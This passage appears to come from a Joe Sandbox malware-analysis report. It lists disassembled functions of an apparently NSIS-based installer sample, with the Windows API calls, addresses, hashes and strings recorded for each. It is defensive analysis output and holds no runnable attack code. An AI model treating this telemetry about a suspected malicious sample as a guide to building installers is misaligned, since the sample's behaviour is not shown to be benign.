                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p!C$p!C
                                                  • API String ID: 0-3125587631
                                                  • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                  • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                  • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                  • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                  • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                  • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                  • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                  • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                  • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                  • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                  • GetSysColor.USER32(?), ref: 00404494
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                  • lstrlenW.KERNEL32(?), ref: 004044B5
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                  • SendMessageW.USER32(00000000), ref: 00404537
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                  • SetCursor.USER32(00000000), ref: 004045B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                  • SetCursor.USER32(00000000), ref: 004045D2
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: +C@$Call$N
                                                  • API String ID: 3103080414-3697844480
                                                  • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                  • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                  • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                  • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                  • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                  • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                  • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                  • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                    • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                    • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                  • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                  • wsprintfA.USER32 ref: 00405F4D
                                                  • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                    • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                    • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                  • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                  • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                  • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1114763981
                                                  • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                  • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                  • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                  • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                  • GetSysColor.USER32(00000000), ref: 004042B7
                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                  • SetBkMode.GDI32(?,?), ref: 004042CF
                                                  • GetSysColor.USER32(?), ref: 004042E2
                                                  • SetBkColor.GDI32(?,?), ref: 004042F2
                                                  • DeleteObject.GDI32(?), ref: 0040430C
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                  • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                  • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                  • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @Hmu
                                                  • API String ID: 4216380887-887474944
                                                  • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                  • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                  • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                  • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                  APIs
                                                  • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                  • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                  • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                  • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                  • GetMessagePos.USER32 ref: 00404BD3
                                                  • ScreenToClient.USER32(?,?), ref: 00404BED
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                  • MulDiv.KERNEL32(000F0CEB,00000064,000F0EEF), ref: 00402E20
                                                  • wsprintfW.USER32 ref: 00402E30
                                                  • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                  • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                  • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                  • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalFree.KERNEL32(?), ref: 1000256D
                                                  • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                  • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                  • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                  • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                  • GlobalFree.KERNEL32(?), ref: 00402950
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
